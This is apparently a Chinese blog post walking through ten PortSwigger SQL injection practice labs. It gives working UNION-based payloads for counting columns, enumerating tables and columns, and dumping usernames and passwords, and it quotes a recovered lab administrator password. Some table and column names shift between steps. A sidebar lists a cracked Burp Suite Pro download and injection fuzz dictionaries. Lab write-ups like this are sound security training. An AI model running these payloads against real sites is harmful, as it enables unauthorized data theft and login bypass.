burp靶场sql注入通关—上

最新推荐文章于 2024-05-14 11:02:08 发布
最新推荐文章于 2024-05-14 11:02:08 发布
阅读量783 收藏 20
点赞数 32
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zqinglele/article/details/137498092
版权

靶场地址

http://portswigger.net/web-security/all-labs#sql-injection

第一关(获取隐藏目录):

1.根据关卡提示需要我们发现一个Gifts隐藏目录里未发售的商品,发现什么也没有

2.使用Burpsuite对网页抓包,对该目录进行sql注入后出现未发售的商品

第二关(密码绕过):

1.这关需要用administrator身份登录程序

2.抓包查看登录的参数都在什么位置,发现可以通过注释密码后只使用用户名登录

3.进行注入,成功通关

第三关(联合注入爆出列数):

1.这关需要确定dual表中的列数

2.确定查询返回的列数以及哪些列包含文本数据,发现是有两列均为字符型

'+order+by+2--      不报错

'+order+by+3--      报错

说明有两列

3.利用union select语句构造payload来确定列数

第四关(联合注入爆出表名):

1.这关需要查询 MySQL 和 Microsoft 的数据库类型和版本,先判断表有几列

'+union+select+'abc','def'%23          不报错

'+union+select+'abc','def','ghi'%23    报错

说明该表有两列

2.爆出数据库名称即可通关

'+union+select+@@version,+NULL#

第五关(联合注入爆出表中数据):

1.这关要确定该表的名称及其包含的列,然后检索表的内容以获取所有用户的用户名和密码,并以管理员用户身份登录

   首先判断表有几列

'+union+select+'abc','def'--      不报错,说明有两列

2.构造payload爆出表中列名,发现user列

'+union+select+table_name,+null+from+information_schema.tables--

3.爆出列中每一行的名称

'+union+select+column_name,+null+from+information_schema.columns+where+table_name='users_yztwwz'--

4.爆出username,passwd里的数据

'+union+select+username_aizwzz,+password_vczyfb+from+users_yztwwz--

5.利用得到的administrator密码登录即可通关

第六关(单个列返回多个数值):

1.根据提示需要我们以内置的dual表为一个有效表名从而进行sql注入,先判断表有几列并都是什么类型

'+union+select+'abc','def'+from+dual--        没有报错说明两列都是字符型

2.构造payload爆出数据库中的所有表名

'+union+select+table_name,null+from+all_tables--

3.爆出user表中所有列名  USERS_FTBUWO

'+union+select+column_name,null+from+all_tab_columns+where+table_name='USERS_TQVSUO'--

4.爆出username和password里的所有数据  PASSWORD_BOZPOX  USERNAME_VQVQFE

'+union+select+USERNAME_DUQWLO,+PASSWORD_MEIAWZ+from+USERS_TQVSUO--

5.使用得到的账号密码登录即可通关

administrator    cbt602b0hnki4f9btfko

第七关(确定返回的列数):

1.这关需要我们用null占位来确定该表有几列,先判断有没有注入点

  用单引号+注释符注入发现能成功返回原来的值,说明有注入点

2.利用null对列数进行测试,判断正确即可通关

'+union+select+null+null--                 报错

'+union+select+null+null+null--         不报错

说明该表有三列

第八关(判断包含文本的列):

1.这关需要从将一个随机值出现在查询结果中,达到确定有数据的列的目的,该随机值在页面最上面

2.确定该表有几列

'+union+select+null,null,null--       说明该表有三列

3.挨个位置判断有随机值的列,发现在第二列处不报错,说明有该值

'+union+select+null,'zAM7dd',null--

第九关(从其他表检索数据):

1.这关要求我们从数据库中一个名为 users 的表,其列名为 username 和 password中获取administrator的密码去登录

  先判断该表的列数和类型

2.获取user表中的username和password的值

3.利用得到的administrator的密码登录即可通关

第十关(单列中检索多个值):

1.首先判断包含的列数

  确定哪列有数值及其类型

'+union+select+null,'abc'--

2.获取user表中的username和password的值,发现报错了

'+union+select+username,password+from+users--

3.根据提示将表中的数据输出为一行

'+union+select+null,username||'~'||password+from+users--

4.利用得到的administrator的密码登录即可通关

季柳东
关注
  • 32
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
burp suite1.7pro破解版
12-11
最新的burpsuite企业版破解。新添加了各种漏洞规则,修正了一些Bug,增进了一些功能。绝对可用。
BurpSQLTruncSanner:SQL截断漏洞的凌乱BurpSuite插件
04-24
[WIP] SQLTruncScanner-扫描端点以查找可能SQL截断漏洞。 Burp Extension,用于识别可能SQL截断漏洞。 模糊请求中的每个参数 最多添加40个字符的填充 版权所有(c)2020 Frans Hendrik Botes(InitRoot) 免责声明 我对您使用该软件不承担任何责任。 发展是以我个人的身份完成的,与我的工作无关。 设置 与Burp Suite的专业版一起使用时,可能与Community Edition一起使用。 在安装之前,请确保已加载并设置了JPython。 您可以通过更新第268行的有效负载设置参数来修改有效负载填充列表。 # Needed params payloadSet = {"5": ' 00', "10": ' 00', "15": ' 00', "20": '
SQL注入fuzz字典
02-28
sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。
SQL关键字字典.txt
07-14
sql注入中,常见的关键字,可用于快速fuzz,判断waf规则。简单实用,推荐配合burp使用
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
BurpSuite辅助SQL盲注安装教程
03-10
BurpSuite辅助SQL盲注安装教程
Burp Suite抓取App数据包的技巧
09-04
通过分析这些数据包,你可以发现潜在的安全问题,如SQL注入、跨站脚本攻击等。 Burp Suite还提供了一些高级功能,如自动化攻击、自定义攻击等,可以进一步增强你的安全性分析能力。但需要注意的是,这些功能需要...
Burp Suite Pro2022.2 Beta最新版
02-23
Burp Spider 是一个映射 web 应用程序的工具。它使用多种智能技术对一个应用程序的内容和功能进行全面的清查。 Burp Spider 通过跟踪 HTML 和 JavaScript 以及提交的表单中的超链接来映射目标应用程序,它还使用了一些其他的线索,如目录列表,资源类型的注释,以及 robots.txt 文件。结果会在站点地图中以树和表的形式显示出来,提供了一个清楚并非常详细的目标应用程序视图。 Burp Spider 能使你清楚地了解到一个 web 应用程序是怎样工作的,让你避免进行大量的手动任务而浪费时间,在跟踪链接,提交表单,精简 HTNL 源代码。可以快速地确人应用程序的潜在的脆弱功能,还允许你指定特定的漏洞,如 SQL 注入,路径遍历。
burpsuite靶场SQL注入总结
向阳-Y.的博客
03-28 6101
burpsuite靶场SQl注入笔记~
pgbackrest 备份工具使用 postgresql
liyayou的博客
05-10 670
我们的备份策略基本是,1天1次完整备份,1个小时1次差异备份。注意:命令中postgres:postgres,是为了授权给postgres用户权限,而且最好是用postgres用户,不然会遇到很多操作报无权限【因为postgresql在安装初始化的时候就自动创建了一个系统用户postgres,默认使用的也是postgres】#加上 --delta ,pgBackRest 自动确定数据库集群目录中的哪些文件可以保留,哪些文件需要从备份中恢复 — 它还会删除备份清单中不存在的文件,以便处理不同的更改。
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause
超哥的博客
05-10 72
openGauss学习笔记-279 openGauss性能调优-实际调优案例08-改写SQL消除in-clause279.1 现象描述279.2 优化说明 openGauss学习笔记-279 open
Oracle数据库之PL/SQL基本语法(八)
最新发布
pursue_mony的博客
05-14 110
PL/SQL 是 Oracle 数据库中使用的过程化 SQL 语言扩展,它允许你在 SQL 语句中嵌入控制结构、变量声明、异常处理等。用于在 PL/SQL 块中输出调试信息。为了看到这些信息,你需要在 SQL*Plus 或其他客户端中启用它(例如,使用。PL/SQL 代码通常被组织在块(block)中。一个块包含三个部分:声明部分、执行部分和异常处理部分。包是 PL/SQL 中一种将逻辑、变量、常量、游标、类型、子程序、异常等组合在一起的数据库对象。在 PL/SQL 中,你可以在。部分来处理运行时错误。
Python框架篇(9):FastApi-SQLAlchemy集成
weixin_39001207的博客
05-10 897
框架将数据库中的表(表结构)映射为面向对象的类(对象),将表中的记录(行)映射为类的实例(对象的实例),将表中的字段(列)映射为类的属性(对象的属性)。框架提供了自动化的数据库映射和对象关系管理,减少了开发人员对数据库操作的工作量,提高了开发效率。框架通常具有良好的跨数据库兼容性,可以轻松地切换不同的数据库,而不必修改大量的代码。框架,可以直接使用面向对象的方式来进行数据库操作,比如增删改查等,而不必编写复杂的。@注意: 此处为了节省篇幅,忽略注册控制到框架的代码,具体使用可参考之前的代码。
远程服务器监控工具Navicat Monitor全新发布v3.0 - 支持PostgreSQL用户
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
05-11 320
远程服务器监控工具Navicat Monitor全新发布v3.0,新版本优化慢查询来提高性能、支持PostgreSQL用户等,欢迎下载最新版组件体验!
SQL Server服务启动缓慢或崩溃问题分析
winrich的博客
05-13 578
本文详细介绍了SQL Server服务启动缓慢、无法响应以及服务崩溃或重启等常见高发故障的解决方法。针对磁盘I/O瓶颈、内存不足、日志文件过大、软件冲突、数据库损坏和配置错误等潜在风险,提供了实用的处理建议,包括检查与升级磁盘性能、增加内存容量、定期清理和管理日志文件、检查与卸载冲突软件、数据备份与修复,以及审查和调整配置等。通过实施这些解决方案,可以有效提升SQL Server的稳定性和性能,确保业务的连续性。
ubuntu postgresql 安装
xie__jin__cheng的博客
05-10 404
添加新用户使用createuser命令来添加新的PostgreSQL用户。在提示时,输入新用户的密码。2.创建新数据库在psql命令行中,你可以使用SQL命令来创建新数据库。退出psql命令行输入\q并回车来退出psql命令行。
SQL的心得
weixin_64842400的博客
05-11 521
接着,系统按照 GROUP BY 子句中的指定字段分组,并对每个分组进行计算,生成虚拟的分组结果表。执行顺序 :from > on > where > group by > having > select > distinct > order by > top。4、聚合函数本质:对指定的列进行聚合,如果我们用了group by,我们可以对每个分组应用内聚合函数。在分组内部,聚合函数会自动处理所有重复的行。具体来说,在执行 SELECT 子句时,系统先计算 SELECT 中的列表达式和函数等,然后。
NIUKE SQL:进阶挑战 (上)
He_jinian的博客
05-10 1081
牛客SQL—进阶01-02 增删改操作+表与索引操作
burpsuite sql注入
06-07
Burp Suite是一款常用的渗透测试工具,其中包含了很多强大的功能,其中之一就是用于检测和利用SQL注入漏洞的工具。 下面是使用Burp Suite进行SQL注入的一般步骤: 1.使用Burp Suite代理拦截目标网站的请求。 2.在Burp Suite的Proxy中选择拦截到的请求,右键选择“Send to Repeater”。 3.在Repeater中进行注入测试,将参数值替换为常见的SQL注入语句,例如: ``` ' or 1=1 -- ``` 4.观察返回的响应,如果发现页面内容发生变化、报错或者延迟等异常情况,则说明存在SQL注入漏洞。 5.利用Burp Suite进行漏洞利用,例如利用Burp Suite的SQLmap插件进行自动化注入测试,或者手动构造SQL语句进行注入测试。 需要注意的是,在进行SQL注入测试时,一定要先获得网站管理员的授权,并且遵守相关的法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值